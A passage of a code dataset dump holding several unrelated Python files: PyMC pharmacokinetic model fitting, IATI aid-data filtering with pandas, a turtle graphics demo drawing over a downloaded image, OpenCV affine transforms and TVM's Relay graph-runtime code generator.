random.normal(loc=0, scale=noise_std, size=len(model_aif))\n \n ### CLASSIC FIT\n fit_parms_PFUM, rsquared, AIC_PFUM, BIC, ss_err_PFUM, fit_PFUM = tl.PKfit(model_aif,\\\n ctr_measured,\\\n model_time,\\\n model = 'PFUM',\\\n initial_parms = true_parms,\n method = 'leastsq',\\\n bounds=[(1e-6,1),(1e-6,4),(1e-6,1)])\n \n \n \n fit_parms_2CUM, rsquared, AIC_2CUM, BIC, ss_err_2CUM, fit_2CUM = tl.PKfit(model_aif,\\\n ctr_measured,\\\n model_time,\\\n model = '2CUM',\\\n initial_parms = true_parms,\n method = 'leastsq',\\\n bounds=[(1e-6,1),(1e-6,4),(1e-6,1)])\n \n AIC_weight_PFUM, AIC_weight_2CUM = tl.AIC_weights([AIC_PFUM, AIC_2CUM])\n weighted_parms = AIC_weight_PFUM * fit_parms_PFUM + AIC_weight_2CUM * fit_parms_2CUM\n \n percentage_error_PFUM_vec = (fit_parms_PFUM - true_parms) / true_parms\n percentage_error_2CUM_vec = (fit_parms_2CUM - true_parms) / true_parms\n percentage_error_weighted_vec = (weighted_parms - true_parms) / true_parms\n \n percentage_error_PFUM[i] = abs(mean(percentage_error_PFUM_vec))\n percentage_error_2CUM[i] = abs(mean(percentage_error_2CUM_vec))\n percentage_error_weigthed[i] = abs(mean(percentage_error_weighted_vec))\n \n \n mean_percentage_error_weighted += percentage_error_weigthed\n mean_percentage_error_PFUM += percentage_error_PFUM\n mean_percentage_error_2CUM += percentage_error_2CUM\n \n\nmean_percentage_error_weighted /= M\nmean_percentage_error_PFUM /= M\nmean_percentage_error_2CUM /= M\n\nplt.plot(mean_percentage_error_weighted, 'r')\nplt.plot(mean_percentage_error_2CUM, 'k')\nplt.plot(mean_percentage_error_PFUM, 'b')\n\n\nraise SystemExit\n\n\nplt.plot(model_time, fit_PFUM,'b')\nplt.plot(model_time, fit_2CUM,'r')\nplt.plot(model_time, ctr_measured,'k.',alpha=.4)\n\n\nprint('AIC Scores are: ', AIC_PFUM, AIC_2CUM,\n '\\nAIC weights are: ', tl.AIC_weights([AIC_PFUM,AIC_2CUM]),\n '\\nActual weights are: ', A, '\\t', B,\n '\\nFit parms are: ', fit_parms_PFUM, fit_parms_2CUM,\n '\\nTrue parms are: .4, .3, .35')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n### MCMCM STUFF\n\n\n# define modell for MCMC\nclass modell_2CUM():\n p1 = pymc.Uniform('p1', lower = 0, upper = 1)\n p2 = pymc.Uniform('p2', lower = 0, upper = 3)\n p3 = pymc.Uniform('p3', lower = 0, upper = 1)\n\n @pymc.deterministic(plot=False)\n def das_modell(p1=p1, p2=p2, p3=p3):\n # return p1 + p1*p2\n #return tl.dummy(p1,p2,x=model_time)\n return tl.PKmodel([p1,p2,p3], model_time, model_aif, model='2CUM')\n \n snr = pymc.Normal('snr',mu=0, tau=1 / (noise_std**2))\n \n signal = pymc.Normal('signal', mu=das_modell, tau=snr**(-2), \n value=ctr_measured,\n observed=True)\n \nclass modell_PFUM():\n p1 = pymc.Uniform('p1', lower = 0, upper = 1)\n p2 = pymc.Uniform('p2', lower = 0, upper = 3)\n p3 = pymc.Uniform('p3', lower = 0, upper = 1)\n\n @pymc.deterministic(plot=False)\n def das_modell(p1=p1, p2=p2, p3=p3):\n # return p1 + p1*p2\n #return tl.dummy(p1,p2,x=model_time)\n return tl.PKmodel([p1,p2,p3], model_time, model_aif, model='PFUM')\n \n snr = pymc.Normal('snr',mu=0, tau=1 / (noise_std**2))\n \n signal = pymc.Normal('signal', mu=das_modell, tau=snr**(-2), \n value=ctr_measured,\n observed=True)\n \n \n\nmod_2CUM = pymc.Model(modell_2CUM)\nmod_PFUM = pymc.Model(modell_PFUM)\n\nCM_fit = pymc.MAP(mod_2CUM)\nPM_fit = pymc.MAP(mod_PFUM)\n\nCM_fit.fit()\nPM_fit.fit()\n\nplt.figure()\nplt.plot(PM_fit.das_modell.get_value(),'b--')\nplt.plot(CM_fit.das_modell.get_value(),'r--')\nplt.plot(ctr_measured,'k.',alpha=.2)\nplt.show()\n\nprint(PM_fit.p1.value, PM_fit.p2.value, 
PM_fit.p3.value)\nprint(CM_fit.p1.value, CM_fit.p2.value, CM_fit.p3.value)\n\nprint('AIC Scores are: ', CM_fit.AIC, PM_fit.AIC,\n '\\nAIC weights are: ', tl.AIC_weights([CM_fit.AIC,PM_fit.AIC]),\n '\\nActual weights are: ', A, '\\t', B)\n\n\n#traditional = pymc.MAP(mod)\n#traditional.fit()\n#\n\n#chain_PFUM = pymc.MCMC(mod_PFUM, db='hdf5', dbname='chain3.hdf5')\n#chain_2CUM = pymc.MCMC(mod_2CUM, db='hdf5', dbname='chain3.hdf5')\n\n#chain.use_step_method(pymc.AdaptiveMetropolis, [TWOCUM.p1,TWOCUM.p2,TWOCUM.p3,TWOCUM.p4])\n\nraise SystemExit\nchain.sample(1e7, burn=0, thin=500)\n\n\n\n\n\n\n\n#plt.figure()\n#plt.plot(model_time,ctr_measured,'x',alpha=1)\n\n#plt.plot(model_time,ctr,'k--')\n\n# plot selection fitted curves\n#for i in arange(0,len(chain.das_modell.trace()),len(chain.das_modell.trace())/10):\n# plt.plot(model_time,chain.das_modell.trace()[:][i,:],alpha=.05)\n \np1_fit = chain.p1.trace[-1]\np2_fit = chain.p2.trace[-1]\np3_fit = chain.p3.trace[-1]\np4_fit = chain.p4.trace[-1]\n\n#p1_fit_trad = traditional.p1.value[0]\n#p2_fit_trad = traditional.p2.value[0]\n#p3_fit_trad = traditional.p3.value[0]\n#p4_fit_trad = traditional.p4.value[0]\n\n\n\n\nctr_fit = tl.PKmodel([p1_fit, p2_fit, p3_fit, p4_fit],\\\n model_time, model_aif, model='2CXM')\n\n#ctr_fit_trad = tl.PKmodel([p1_fit_trad, p2_fit_trad, p3_fit_trad, p4_fit_trad],\\\n# model_time, model_aif, model='2CXM')\n\n#print(p1_fit_trad, p1_fit, p1)\n#print(p2_fit_trad, p2_fit, p2)\n#print(p3_fit_trad, p3_fit, p3)\n#print(p4_fit_trad, p4_fit, p4)\n\n\nplt.figure()\nplt.plot(model_time, ctr_measured)\n#plt.plot(model_time, ctr_fit_trad)\nplt.plot(model_time, ctr_fit)\n#plot(model_time, ctr)\n\n#plt.figure()\n#plt.plot(ctr-ctr_fit_trad)\n\n\n\n\npymc.Matplot.plot(chain.p1)\npymc.Matplot.plot(chain.p2)\npymc.Matplot.plot(chain.p3)\npymc.Matplot.plot(chain.p4)\npymc.Matplot.plot(chain.snr)\n\n\n#pickle.dump(chain, open('/home/tammo/Dropbox/summer_14/programming/chain2.p', 'wb'))","sub_path":"PyMc/model_unmixing/model_unmixing.py","file_name":"model_unmixing.py","file_ext":"py","file_size_in_byte":7888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"67304871","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 3 10:22:31 2019\n\n@author: Matthew Wolf\n\"\"\"\nimport pandas as pd\n\ndef data_setup():\n \n \"\"\"======================================\n This function loads and cleans IATI data from eight donors in preparation for \n ANDE Methodology testing. 
This includes renaming the donors in the data, \n deleting some incomplete rows of WBG data, and filling in blanks\n ======================================\"\"\"\n \n import pandas as pd\n \n # list of fields we to keep\n iati_fields = ['iati-identifier','reporting-org','default-language', 'title','description','start-planned','end-planned',\\\n 'start-actual', 'end-actual','recipient-country-code','recipient-country', 'recipient-country-percentage',\\\n 'sector','sector-code', 'sector-percentage','sector-vocabulary','sector-vocabulary-code', 'default-currency',\\\n 'total-Commitment','total-Disbursement','total-Expenditure']\n \n # list of fields to import as datetimes\n date_fields = ['start-planned','end-planned','start-actual','end-actual']\n \n # dictionary of default NaN values for each of these columns\n field_nas = {'iati-identifier':\"\",'reporting-org':\"\",'default-language':\"\", 'title':\"\",'description':\"\",'start-planned':\"\",'end-planned':\"\",\\\n 'start-actual':\"\", 'end-actual':\"\",'recipient-country-code':\"\",'recipient-country':\"\", 'recipient-country-percentage':\"\",\\\n 'sector':\"\",'sector-code':\"\", 'sector-percentage':\"\",'sector-vocabulary':\"\",'sector-vocabulary-code':\"\", 'default-currency':\"\",\\\n 'total-Commitment':0,'total-Disbursement':0,'total-Expenditure':0}\n \n # locally saved CSV files for each of the eight donors\n #TODO - convert these read_csv calls to one or several IATI API call(s)\n wbg_raw = pd.read_csv('WBG_IATI_Activities_20190315.csv', low_memory=False, usecols=iati_fields, parse_dates=date_fields)\n dfid_raw = pd.read_csv('DFID_IATI_Activities_20190315.csv', low_memory=False, usecols=iati_fields, parse_dates=date_fields)\n sida_raw = pd.read_csv('SIDA_IATI_Activities_20190315.csv', low_memory=False, usecols=iati_fields, parse_dates=date_fields)\n bmgf_raw = pd.read_csv('BMGF_IATI_Activities_20190315.csv', low_memory=False, usecols=iati_fields, parse_dates=date_fields)\n devco_raw = pd.read_csv('DEVCO_IATI_Activities_20190315.csv', low_memory=False, usecols=iati_fields, parse_dates=date_fields)\n gac_raw = pd.read_csv('GAC_IATI_Activities_20190315.csv', low_memory=False, usecols=iati_fields, parse_dates=date_fields)\n gf_raw = pd.read_csv('Global_Fund_IATI_Activities_20190315.csv', low_memory=False, usecols=iati_fields, parse_dates=date_fields)\n MFANe_raw = pd.read_csv('MFA_Netherlands_IATI_Activities_20190315.csv', low_memory=False, usecols=iati_fields, parse_dates=date_fields)\n \n #concatenate the data from each donor\n dfs = [wbg_raw, dfid_raw, sida_raw, bmgf_raw, devco_raw, dfid_raw, gac_raw, gf_raw, MFANe_raw]\n data = pd.concat(dfs, ignore_index=True, sort=False)\n \n #Change names of reporting-orgs to donor shortnames for simplicity\n data.loc[data['reporting-org'] == 'Sweden', 'reporting-org'] = 'Sida'\n data.loc[data['reporting-org'] == 'Department for International Development', 'reporting-org'] = 'DFID'\n data.loc[data['reporting-org'] == 'European Commission - Development and Cooperation-EuropeAid', 'reporting-org'] = 'DEVCO'\n data.loc[data['reporting-org'] == 'Foreign Affairs, Trade and Development Canada (DFATD)', 'reporting-org'] = 'GAC'\n data.loc[data['reporting-org'] == 'Ministry of Foreign Affairs (DGIS)', 'reporting-org'] = 'MFA Netherlands'\n data.loc[data['reporting-org'] == 'The Global Fund to Fight AIDS, Tuberculosis and Malaria', 'reporting-org'] = 'Global Fund'\n data.loc[data['reporting-org'] == 'Bill and Melinda Gates Foundation', 'reporting-org'] = 'B&MGF'\n \n #WB IATI data contains 30 random 
rows with incomplete data and a 'World Bank Group' reporting-org\n data.drop(data[data['reporting-org'] == 'World Bank Group'].index, inplace=True)\n \n # if there's no sector-vocabulary and no sector-vocabulary-code, drop the row\n #TODO - keep all dropped rows for later analysis in a dictionary {drop-logic: dropped df}\n #data.drop(data[(data['sector-vocabulary'].isnull()) & (data['sector-vocabulary-code'].isnull())].index, inplace=True)\n \n #fill in using the dict specified above\n data.fillna(value=field_nas)\n \n data = data.reset_index()\n del data['index']\n \n return data\n \ndef data_sectors(data, sectors):\n \n \"\"\"======================================\n This function takes a list of strings, each representing a IATI sector-code\n from any sector vocabulary. It filters the data and keeps any rows that are\n tagged with these sectors\n ======================================\"\"\"\n \n import pandas as pd\n results = pd.DataFrame()\n for sector in sectors:\n #for i in data.index:\n # print(sector + \" in \" + str(data.at[i,'sector-code']) + \" ?\")\n # print(sector in str(data.at[i,'sector-code']))\n temp = data[data['sector-code'].astype('str').str.contains(sector, na=False)]\n results = pd.concat([results, temp], ignore_index=True, sort=False)\n\n return results\n \ndef data_keywords(data, keywords): \n \n \"\"\"======================================\n This function takes a list of strings, each representing a text keyword in\n ALL LOWERCASE text. It filters the data by checking the title and description\n of each row for each keyword, keeping any rows where are least one keyword.\n ======================================\"\"\"\n \n import pandas as pd\n results = pd.DataFrame()\n for keyword in keywords:\n temp = data[(data['title'].str.lower().str.contains(keyword, na=False)) &\\\n (data['description'].str.lower().str.contains(keyword, na=False))]\n results = pd.concat([results, temp], ignore_index=True, sort=False)\n \n return results\n\ndef data_dates(data, startdate, enddate):\n pass\n\n \n\n# =============================================================================\n# def data_psa_tag(data, psa_dict):\n# \n# import pandas as pd\n# results = pd.DataFrame\n# =============================================================================\n\ndef data_investigate(data, sectors, keywords):\n \n \"\"\"======================================\n This function runs some diagnostic tests, for certain data, sectors, and\n keywords inputs. It shows how large the original dataset is, and its \n breakdown by # of rows and sum of total funding commitments by donor, and\n shows this same breakdown again for the data after:\n 1. Applying just the sector filter\n 2. Applying just the keyword filter\n 3. Inner joining the sector-filtered and keyword-filtered data\n 4. Outer joining the sector-filtered and keyword-filtered data\n ======================================\"\"\"\n \n sectors_data = data_sectors(data, sectors)\n keywords_data = data_keywords(data, keywords)\n inner = pd.merge(sectors_data, keywords_data, how=\"inner\")\n outer = pd.merge(sectors_data, keywords_data, how=\"outer\")\n \n def print_stats(df):\n print(\"Rows : \" + str(df.shape[0]))\n print(\"Columns: \" + str(df.shape[1]) + \"\\n\")\n print(\"Rows per donor: \")\n print(df.groupby(['reporting-org'])['iati-identifier'].count())\n print()\n print(\"Commitments per donor: \")\n print(df.groupby(['reporting-org'])['total-Commitment'].sum())\n print()\n \n print(\"1. FOR FULL DATA SET:\")\n print_stats(data)\n print(\"2. 
FOR SECTOR-FILTERED DATA:\")\n print_stats(sectors_data)\n print(\"3. FOR KEYWORD-FILTERED DATA:\")\n print_stats(keywords_data)\n print(\"4. FOR INNER JOIN OF SECTOR/KEYWORD-FILTERED DATA:\")\n print_stats(inner)\n print(\"5. FOR OUTER JOIN OF SECTOR/KEYWORD-FILTERED DATA:\")\n print_stats(outer)\n \n\nsectors = ['13010', '13020', '13030', '13040', '13081'] \nkeywords = [\"reproductive\", \"family planning\", \"contraceptive\", \"abortion\", \\\n \"pregnancy\", \"sexual\", \"gender-based violence\", \"domestic violence\",\\\n \"female genital mutilation\", \"fgm\", \"population census\", \"hiv\", \"std\",\\\n \"aids\", \"obstetric\", \"antenatal\", \"perinatal\",\"neonatal\", \"postnatal\",\\\n \"newborn\", \"health personnel\", \"childhood\", \"immunization\", \"polio\",\\\n \"measles\", \"tetanus\", \"congenital\",\"disabilities\", \"breastfeeding\"\\\n \"infant feeding\", \"doctor\", \"nurse\", \"midwive\", \"pharmacist\", \\\n \"community health worker\", \"health specialists\", \"medical device\",\\\n \"m-Health\", \"e-Health\", \"mobile health\",\"health data\", \"medical products\"\\\n \"health products\", \"medical services\", \"health services\", \"clinical studies\"\\\n \"clinical trials\", \"medicine\", \"vaccine\"]\n","sub_path":"data_setup.py","file_name":"data_setup.py","file_ext":"py","file_size_in_byte":9004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"115595975","text":"''' turtle_Tk_Canvas_Image_url.py\ndisplay a GIF image obtained from an internet web page\non a Tkinter canvas, then use the canvas for some turtle drawing\nmodified Vegaseat code\n'''\nimport io\nimport base64\nimport turtle\ntry:\n # Python2\n import Tkinter as tk\n from urllib2 import urlopen\nexcept ImportError:\n # Python3\n import tkinter as tk\n from urllib.request import urlopen\nroot = tk.Tk()\nroot.title(\"turtle graphics a website image\")\n# this GIF picture previously downloaded to tinypic.com\nimage_url = \"http://i46.tinypic.com/r9oh0j.gif\"\nimage_byt = urlopen(image_url).read()\nimage_b64 = base64.encodestring(image_byt)\nphoto = tk.PhotoImage(data=image_b64)\n\n# create a white canvas large enough to fit the image+\nw = 540\nh = 340\ncv = tk.Canvas(bg='white', width=w, height=h)\ncv.pack()\n# this makes the canvas a turtle canvas\n# point(0, 0) is in the center now\ntu = turtle.RawTurtle(cv)\n# put the image on the turtle canvas with\n# create_image(xpos, ypos, image, anchor)\nxpos = int(w/2 * 0.9)\nypos = int(h/2 * 0.9)\nprint(xpos, ypos)\ncv.create_image(-xpos, -ypos, image=photo, anchor='nw')\n# now do some turtle graphics\ntu.pensize(2)\nfor radius in range(50, 200, 40):\n # pen up\n tu.up()\n # move pen to point x, y\n # keeps the center of the circle at canvas center\n tu.goto(0, -radius)\n # pen down\n tu.down()\n tu.circle(radius)\nroot.mainloop()\n","sub_path":"exemplos-em-python3/download-image-web.py","file_name":"download-image-web.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"416549295","text":"\nfname = input('Enter file name:')\ncount = 0\ntry:\n fhand = open(fname)\nexcept:\n print('File name cannot be oppened:', fname)\n exit()\nfor line in fhand:\n print(line.upper().strip())\n count = count+1\nprint(count)\n","sub_path":"py_upper.py","file_name":"py_upper.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} 
+{"seq_id":"523688838","text":"import cv2\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport math \ndef oper(M,img,hei,wei):\n h,w,c=img.shape\n img_out=np.zeros((hei,wei,c),np.uint8)\n #img_out=np.zeros((h,w,c),np.uint8)\n iden=np.array([[M[1][1],M[1][0]],[M[0][1],M[0][0]]])\n B=np.array([[M[1][2]],[M[0][2]]])\n for i in range(h):\n for j in range(w):\n vector=np.array([[i],[j]])\n aux=img[i][j]\n res=np.dot(iden,vector)+B\n res=res.astype(int)\n if(res[0][0]=0):\n if(res[1][0]=0):\n img_out[res[0][0]][res[1][0]]=aux\n if(iden[0][1]==0 and iden[1][0]==0):\n if(iden[1][1]>1):\n if(iden[0][0]<=1):\n for j in range(0,img_out.shape[0]):\n aux=img_out[j][0]\n for i in range(0,img_out.shape[1]):\n if(i%int(iden[1][1])==0):\n aux=img_out[j][i]\n else:\n img_out[j][i]=aux;\n else:\n for j in range(0,img_out.shape[0],int(iden[0][0])):\n aux=img_out[j][0]\n for i in range(0,img_out.shape[1]):\n if(i%int(iden[1][1])==0):\n aux=img_out[j][i]\n else:\n img_out[j][i]=aux;\n if(iden[0][0]>1):\n for j in range(0,img_out.shape[1]):\n aux=img_out[0][j]\n for i in range(0,img_out.shape[0]):\n if(i%int(iden[0][0])==0):\n aux=img_out[i][j]\n else:\n img_out[i][j]=aux;\n\n return img_out\n\n'''\n#Esala\n\nimg= cv2.imread('jesse.jpg')\nf,c,x=img.shape\nM=np.array([[2,0,0],[0,0.5,0]])\nres = oper(M,img,int(f/2),int(c*2))\ndst=cv2.warpAffine(img, M, (c*2, int(f/2)))\n#Warpaffine\ncv2.imshow('escalecv.jpg',dst)\n#Función propia\ncv2.imshow('miescale.jpg',res)\n'''\n\n\n'''\n#Translate\nimg= cv2.imread('jesse.jpg')\nf,c,x=img.shape\nM=np.float32([[1,0,100],[0,1,100]])\nres = oper(M,img,f,c)\ndst=cv2.warpAffine(img, M, (c, f))\n#Warpaffine\ncv2.imshow('traslacv.jpg',dst)\n#Función propia\ncv2.imshow('mitrasla.jpg',res)\n'''\n\n\n'''\n#ROTACION\nimg= cv2.imread('jesse.jpg')\nangu=math.radians(45)\nf,c,x=img.shape\nM=np.array([[math.cos(angu), math.sin(angu), (1 - math.cos(angu)) * c/2 - math.sin(angu) * f/2], [-math.sin(angu), math.cos(angu), math.sin(angu) * c/2 + (1 - math.sin(angu)) * f/2]])\nres = oper(M,img,f,c)\ncv2.imshow('mirota.jpg',res);\nM2 = np.float32([[math.cos(angu), math.sin(angu), (1 - math.cos(angu)) * c/2 - math.sin(angu) * f/2], [-math.sin(angu), math.cos(angu), math.sin(angu) * c/2 + (1 - math.sin(angu)) * f/2]])\ncv2.imshow('cv_rotate.jpg',cv2.warpAffine(img, M2, (c, f)))\n'''\n'''\n#Shear\n\nimg= cv2.imread('jesse.jpg')\nf,c,x=img.shape\nM = np.float32([[1,-0.6,0],[-0.1,1,0]])\nres = oper(M,img,f,c)\ndst=cv2.warpAffine(img, M, (c, f))\n#Warpaffine\ncv2.imshow('mishear.jpg',dst)\n#Función propia\ncv2.imshow('shear_cv.jpg',res)\n'''\n","sub_path":"singleselection (1).py","file_name":"singleselection (1).py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"524805770","text":"\"\"\"\nA compiler from a Relay expression to TVM's graph runtime.\n\nThe compiler is built from a few pieces.\n\nFirst we define a compiler from a single Relay expression to the\ngraph langauge. 
We require the expression to be a function.\nThe function's parameters correpond to the placeholder/inputs\nand model parameters found in the computation graph representation.\nThe body of the function represents the computation graph.\n\nThe compiler's output is a program in the graph language, which is composed of\ngraph langauge is composed of Node, NodeRef, InputNode, OpNode.\nThis \"little language\" represents programs in TVM's graph format.\n\nTo connect to the graph runtime, we use a printer that converts our graph format\ninto TVM's JSON format. The resulting string can be loaded by\ncontrib.graph_runtime or any other TVM runtime comptatible system.\n\"\"\"\n\nfrom __future__ import absolute_import\nimport json\nimport attr\nfrom . import _backend\nfrom . import compile_engine\nfrom ..op import Op\nfrom ..expr import Function, GlobalVar\nfrom ..expr_functor import ExprFunctor\nfrom ..ty import TupleType, TensorType\n\n\n@attr.s\nclass NodeRef(object):\n \"\"\"A reference to a node, used for constructing the graph.\"\"\"\n ident = attr.ib()\n index = attr.ib(default=0)\n version = attr.ib(default=0)\n\n def to_json(self):\n return [self.ident, self.index, self.version]\n\n\n@attr.s\nclass Node(object):\n \"\"\"The base class for nodes in the TVM runtime system graph input.\"\"\"\n name = attr.ib()\n attrs = attr.ib()\n\n def to_json(self):\n raise Exception(\"Abstract method, please implement me.\")\n\n\n@attr.s\nclass InputNode(Node):\n \"\"\"An input node in the TVM runtime system graph input.\"\"\"\n name = attr.ib()\n attrs = attr.ib()\n\n def to_json(self):\n return {\n \"op\": \"null\",\n \"name\": self.name,\n \"inputs\": []\n }\n\n\n@attr.s\nclass OpNode(Node):\n \"\"\"An operator node in the TVM runtime system\"s graph input.\"\"\"\n op_name = attr.ib()\n inputs = attr.ib()\n op_attrs = attr.ib()\n num_outputs = attr.ib(default=1)\n\n def to_json(self):\n attrs = dict.copy(self.op_attrs)\n # Extend ops with extra info.\n attrs[\"func_name\"] = self.op_name\n attrs[\"flatten_data\"] = \"0\"\n attrs[\"num_inputs\"] = str(len(self.inputs))\n attrs[\"num_outputs\"] = str(self.num_outputs)\n\n return {\n \"op\": \"tvm_op\",\n \"name\": self.name,\n \"attrs\": attrs,\n \"inputs\": self.inputs\n }\n\n\ndef shape_to_json(shape):\n \"\"\"Convert symbolic shape to json compatible forma.\"\"\"\n return [sh.value for sh in shape]\n\n\nclass GraphRuntimeCodegen(ExprFunctor):\n \"\"\"The compiler from Relay to the TVM runtime system.\"\"\"\n nodes = attr.ib()\n var_map = attr.ib()\n\n def __init__(self, mod, target):\n ExprFunctor.__init__(self)\n self.mod = mod\n self.target = target\n self.nodes = []\n self.var_map = {}\n self.params = {}\n self.storage_map = None\n self.compile_engine = compile_engine.get()\n self.lowered_funcs = set()\n self._name_map = {}\n\n def add_node(self, node, expr):\n \"\"\"\n Add a node to the graph.\n\n Parameters\n ----------\n node: Node\n The node to add to the graph.\n\n expr: tvm.relay.Expr\n The corresponding expression.\n\n Returns\n -------\n node_ref: Union[NodeRef, List[NodeRef]]\n A reference to the node.\n \"\"\"\n checked_type = expr.checked_type\n # setup storage ids\n assert expr in self.storage_map\n node.attrs[\"storage_id\"] = [\n x.value for x in self.storage_map[expr]\n ]\n\n node_id = len(self.nodes)\n self.nodes.append(node)\n # Tuple return value, flatten as tuple\n if isinstance(checked_type, TupleType):\n ret = []\n shape = []\n dtype = []\n for i, typ in enumerate(checked_type.fields):\n if not isinstance(typ, TensorType):\n 
raise RuntimeError(\"type %s not supported\" % typ)\n ret.append(NodeRef(node_id, i))\n shape.append(shape_to_json(typ.shape))\n dtype.append(typ.dtype)\n node.attrs[\"shape\"] = shape\n node.attrs[\"dtype\"] = dtype\n assert isinstance(node, OpNode)\n node.num_outputs = len(checked_type.fields)\n return tuple(ret)\n # Normal tensor return type\n if not isinstance(checked_type, TensorType):\n raise RuntimeError(\"type %s not supported\" % checked_type)\n node.attrs[\"shape\"] = [shape_to_json(checked_type.shape)]\n node.attrs[\"dtype\"] = [checked_type.dtype]\n node.num_outputs = 1\n return NodeRef(node_id, 0)\n\n def visit_tuple(self, vtuple):\n fields = []\n for field in vtuple.fields:\n ref = self.visit(field)\n assert isinstance(ref, NodeRef)\n fields.append(ref)\n return tuple(fields)\n\n def visit_tuple_getitem(self, op):\n vtuple = self.visit(op.tuple_value)\n assert isinstance(vtuple, tuple)\n return vtuple[op.index]\n\n def visit_constant(self, op):\n index = len(self.params)\n name = \"p%d\" % index\n self.params[name] = op.data\n node = InputNode(name, {})\n return self.add_node(node, op)\n\n def visit_function(self, _):\n raise RuntimeError(\"function not supported\")\n\n def visit_if(self, _):\n raise RuntimeError(\"if not supported\")\n\n def visit_global_var(self, _):\n raise RuntimeError()\n\n def visit_let(self, let):\n \"\"\"\n Visit the let binding, by first traversing its value,\n then setting the metadata on the returned NodeRef.\n\n Finally visit the body, and return the NodeRef corresponding\n to it.\n\n Parameters\n ----------\n let: tvm.relay.Expr\n The let binding to transform.\n\n Returns\n -------\n ref: NodeRef\n The node reference to the body.\n \"\"\"\n assert let.var not in self.var_map\n self.var_map[let.var] = self.visit(let.value)\n return self.visit(let.body)\n\n def visit_var(self, rvar):\n return self.var_map[rvar]\n\n def visit_call(self, call):\n \"\"\"Transform a ::tvm.relay.Call into an operator in the TVM graph.\"\"\"\n if isinstance(call.op, Op):\n raise Exception(\n \"Operators should be transformed away; try applying \" +\n \"the fuse_ops transformation to the expression.\")\n elif isinstance(call.op, GlobalVar):\n func = self.mod[call.op]\n elif isinstance(call.op, Function):\n func = call.op\n else:\n raise Exception(\n \"TVM runtime does not support calls to {0}\".format(type(call.op)))\n if int(func.attrs.Primitive) != 1:\n raise Exception(\n \"TVM only supports calls to primitive functions \" +\n \"(i.e. functions composed of fusable operator invocations)\")\n\n cached_func = self.compile_engine.lower(func, self.target)\n for loweredf in cached_func.funcs:\n self.lowered_funcs.add(loweredf)\n\n inputs = []\n # flatten tuple in the call.\n for arg in call.args:\n res = self.visit(arg)\n if isinstance(arg.checked_type, TupleType):\n assert isinstance(res, tuple)\n inputs += res\n else:\n inputs.append(res)\n\n inputs = [x.to_json() for x in inputs]\n op_name = cached_func.func_name\n op_node = OpNode(self._get_unique_name(op_name), {},\n op_name, inputs, {})\n return self.add_node(op_node, call)\n\n def visit_op(self, _):\n raise Exception(\"can not compile op in non-eta expanded form\")\n\n def _get_json(self):\n \"\"\"\n Convert the sequence of nodes stored by the compiler into the\n TVM graph runtime format.\n\n Returns\n -------\n graph_json : str\n The generated JSON as a string.\n \"\"\"\n nodes = []\n # First we compute \"nodes\" field.\n for node in self.nodes:\n nodes.append(node.to_json())\n\n arg_nodes = []\n # Compute \"arg_nodes\" 
and \"heads\" fields.\n for i, node in enumerate(self.nodes):\n if isinstance(node, InputNode):\n arg_nodes.append(i)\n\n heads = self.heads\n heads = heads if isinstance(heads, tuple) else [heads]\n heads = [x.to_json() for x in heads]\n\n # Compute \"node_row_ptr\" and entry attributes.\n num_entry = 0\n shapes = []\n storage_ids = []\n dltypes = []\n node_row_ptr = [0]\n for node in self.nodes:\n assert node.num_outputs == len(node.attrs[\"shape\"])\n shapes += node.attrs[\"shape\"]\n dltypes += node.attrs[\"dtype\"]\n storage_ids += node.attrs[\"storage_id\"]\n num_entry += node.num_outputs\n node_row_ptr.append(num_entry)\n\n # Compute \"attrs\" field.\n attrs = {}\n attrs[\"shape\"] = [\"list_shape\", shapes]\n attrs[\"storage_id\"] = [\"list_int\", storage_ids]\n attrs[\"dltype\"] = [\"list_str\", dltypes]\n\n json_dict = {\n \"nodes\": nodes,\n \"arg_nodes\": arg_nodes,\n \"heads\": heads,\n \"attrs\": attrs,\n \"node_row_ptr\": node_row_ptr\n }\n\n return json.dumps(json_dict, indent=2)\n\n def debug_dump_memory_plan(self, func):\n \"\"\"Debug function to dump memory plan.\"\"\"\n def _annotate(expr):\n if expr in self.storage_map:\n return str(self.storage_map[expr])\n return \"\"\n return func.astext(show_meta_data=False, annotate=_annotate)\n\n def codegen(self, func):\n \"\"\"Compile a single function into a graph.\n\n Parameters\n ----------\n func: tvm.relay.Expr\n The function to compile.\n\n Returns\n -------\n graph_json : str\n The graph json that can be consumed by runtime.\n\n lowered_funcs : List[tvm.LoweredFunc]\n The lowered functions.\n\n params : Dict[str, tvm.nd.NDArray]\n Additional constant parameters.\n \"\"\"\n self.storage_map = _backend.GraphPlanMemory(func)\n # First we convert all the parameters into input nodes.\n for param in func.params:\n node = InputNode(param.name_hint, {})\n self.var_map[param] = self.add_node(\n node, param)\n\n # Then we compile the body into a graph which can depend\n # on input variables.\n self.heads = self.visit(func.body)\n graph_json = self._get_json()\n lowered_funcs = list(self.lowered_funcs)\n return graph_json, lowered_funcs, self.params\n\n def _get_unique_name(self, name):\n if name not in self._name_map:\n self._name_map[name] = 1\n return name\n index = self._name_map[name]\n self._name_map[name] += 1\n return self._get_unique_name(name + str(index))\n","sub_path":"python/tvm/relay/backend/graph_runtime_codegen.py","file_name":"graph_runtime_codegen.py","file_ext":"py","file_size_in_byte":11210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"77412970","text":"import urllib.parse\nimport requests\nfrom requests.auth import HTTPBasicAuth\nfrom tqdm import tqdm\nimport os\nfrom PIL import Image, ImageChops, ImageOps\nimport math\nimport numpy as np\n\n\n# Please don't run this function unless you have to. There's a limit of 5000 requests per month. 
